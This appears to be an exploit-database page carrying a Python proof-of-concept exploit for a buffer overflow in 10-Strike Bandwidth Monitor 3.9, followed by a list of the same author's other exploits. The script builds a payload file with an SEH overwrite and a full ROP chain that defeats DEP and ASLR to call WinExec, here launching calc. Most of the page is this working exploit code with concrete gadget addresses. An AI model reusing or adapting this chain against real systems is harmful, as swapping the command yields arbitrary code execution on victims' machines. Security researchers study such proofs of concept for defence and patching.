Search for hundreds of thousands of exploits

"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)"

Author

Exploit author

boku

Platform

Exploit platform

windows

Release date

Exploit published date

2020-06-10

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: 2020-07-07
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
#   1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
#   2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
#     - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
#   3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
#   4. A pointer to the LoadLibraryA symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call LoadLibraryA and find the memory address of the [kernel.dll] module; as it is protected by ASLR and will be different every time the process runs.
#   5. A pointer to the GetProcAddress symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call GetProcAddress to find the memory address of the WinExec Symbol within [kernel32.dll].
#   6. Use Gadgets to call the WinExec Function and open calc.
#   - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
# Recreate: 
#   Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
#   Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
#   Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Modulename
#   -------------------------------------------------------------------------------------------
#   0x12000000 | 0x12057000 | False  | True    | False |  False   | False  | [ssleay32.dll]
#   0x00400000 | 0x01247000 | False  | False   | False |  False   | False  | [BandMonitor.exe]
#   0x11000000 | 0x11155000 | False  | True    | False |  False   | False  | [LIBEAY32.dll]
#   -------------------------------------------------------------------------------------------

import struct
OS_retSled = '\x41'*400
retSled    = '\x24\x01\x06\x11'*100 #11060124  # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
def createRopChain():
    ropGadgets = [
    # HMODULE LoadLibraryA( LPCSTR lpLibFileName);
    #   $ ==>     > 1106905D  CALL to LoadLibraryA
    #   $+4       > 012428B4  FileName = "kernel32.dll"
        0x012126f5,  # POP EAX # RETN [BandMonitor.exe] 
        0x110e70bc,  # kernel32!loadlibrarya [LIBEAY32.dll] 
        0x110495ef,  # JMP [EAX] [LIBEAY32.dll]
        0x1106905d,  # PUSH EAX # POP ESI # RETN [LIBEAY32.dll] 
        0x012428B4,  # &String = "kernel32.dll\x00"  
        # EAX&ESI = &kernel32.dll
    # FARPROC GetProcAddress( HMODULE hModule, LPCSTR  lpProcName);
    #    $ ==>    > 011D53D2  CALL to GetProcAddress
    #    $+4      > 76C40000  hModule = (KERNEL32)
    #    $+8      > 0014F6CC  ProcNameOrOrdinal = "WinExec"
        0x01226010,  # PUSH ESP # AND AL, 4 # POP ECX # POP EDX # RETN [BandMonitor.exe] - [move esp -> ecx]
        0xfffff2D4,  # EDX = Offset2String; ECX = ESP
        0x011d53d2,  # xchg eax, ecx # ret [BandMonitor.exe] - eax=esp & ecx = "kernel32.dll\x00"
        0x11061ea7,  # sub eax, edx # ret [LIBEAY32.dll]- eax=&String="WinExec\d4"
        0x1106905d,  # push eax # pop esi # ret [LIBEAY32.dll] - ESI&EAX="WinExec\d4"
        0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,  
                     # (INC EAX # RETN)*7 [LIBEAY32.dll]
        0x011f282b,  # xor [eax], dl # ret [BandMonitor.exe] - ESI="WinExec\x00"
        0x01203a3b,  # xchg eax, esi # ret [BandMonitor.exe] - EAX="WinExec\x00"
        0x11084dca,  # xchg eax, edx # ret [LIBEAY32.dll]    - EDX="WinExec\x00"
        0x012126f5,  # POP EAX # RETN [BandMonitor.exe] 
        0x110e708c,  # kernel32!getprocaddress [LIBEAY32.dll]
        0x1109cdb9,  # mov eax, ds:[eax] # ret [LIBEAY32.dll] - EAX = &GetProcAddress
        0x1106CE04,  # mov [esp+8], edx # mov [esp+4], ecx # jmp near eax
        0x011d53d2,  # xchg eax, ecx # ret [BandMonitor.exe] - ECX=&KERNEL32.WinExec
        0xffffffff,  # NOP - Overwritten by GetProcAddress Stack Setup
        0xffffffff,  # NOP - Overwritten by GetProcAddress Stack Setup
    # Call WinExec( CmdLine, ShowState );
    #   CmdLine   = "calc"
    #   ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
        0x0106a762,  # INC ESI # RETN [BandMonitor.exe] - ESI="calc\x"
        0x01203a3b,  # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\xff"
        0x1106905d,  # PUSH EAX # POP ESI # RETN [LIBEAY32.dll] - EAX&ESI="calc\xff"
        0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a, # (INC EAX # RETN)*4 [LIBEAY32.dll]
        0x01226014,  # POP EDX # RETN [BandMonitor.exe]
        0xffffffff,  # dl = 0xff 
        0x011f282b,  # xor [eax], dl # ret [BandMonitor.exe] - ESI="calc\x00"
        0x01218952,  # NEG EDX # RETN [BandMonitor.exe] - EDX=0x01 = SW_SHOWNORMAL
        0x01203a3b,  # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\x00"
        0x1102ce1f,  # xchg eax, ecx  [LIBEAY32.dll] - ECX="calc\x00" = CmdLine - EAX=&KERNEL32.WinExec
        0x1106CE04,  # mov [esp+8], edx # mov [esp+4], ecx # jmp near eax
        0x11060124   # retn [LIBEAY32.dll] - ROP NOP 
    ]
    return ''.join(struct.pack('<I', _) for _ in ropGadgets)
ropChain = createRopChain()
OS_nSEH    = '\x43'*(4188-len(OS_retSled+retSled+ropChain))
nSEH       = '\x44'*4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
SEH        = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
WinExec    = '\x57\x69\x6e\x45' # WinE
WinExec   += '\x78\x65\x63\xd4' # xec.
calc       = '\x63\x61\x6c\x63' #  calc
calc      += '\xff\x42\x42\x42' #  ....
extra      = '\x44'*2000
buffer  = OS_retSled + retSled + ropChain + OS_nSEH + nSEH + SEH + WinExec + calc + extra
File    = 'poc.txt'
try:
    payload   = buffer
    f         = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except:
    print File + ' failed to create'
Release DateTitleTypePlatformAuthor
2020-09-15"Tailor MS 1.0 - Reflected Cross-Site Scripting"webappsphpboku
2020-09-03"BarracudaDrive v6.5 - Insecure Folder Permissions"localwindowsboku
2020-09-02"Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)"webappsphpboku
2020-08-13"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)"webappsphpboku
2020-08-10"Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)"webappsphpboku
2020-07-26"LibreHealth 2.0.0 - Authenticated Remote Code Execution"webappsphpboku
2020-07-26"Online Course Registration 1.0 - Unauthenticated Remote Code Execution"webappsphpboku
2020-06-16"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path"localwindowsboku
2020-06-10"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)"localwindowsboku
2020-05-22"Gym Management System 1.0 - Unauthenticated Remote Code Execution"webappsphpboku
2020-05-07"Pisay Online E-Learning System 1.0 - Remote Code Execution"webappsphpboku
2020-05-01"ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting"webappsphpboku
2020-05-01"Online Scheduling System 1.0 - Authentication Bypass"webappsphpboku
2020-05-01"Online Scheduling System 1.0 - Persistent Cross-Site Scripting"webappsphpboku
2020-04-20"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path"localwindowsboku
2020-04-20"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)"localwindowsboku
2020-04-13"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)"localwindowsboku
2020-02-17"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"localwindowsboku
2020-02-17"Cuckoo Clock v5.0 - Buffer Overflow"localwindowsboku
2020-02-17"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path"localwindowsboku
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-11"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path"localwindowsboku
2020-02-11"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path"localwindowsboku
2020-02-11"Torrent iPod Video Converter 1.51 - Stack Overflow"localwindowsboku
2020-02-11"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path"localwindowsboku
2020-02-11"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path"localwindowsboku
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48570/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.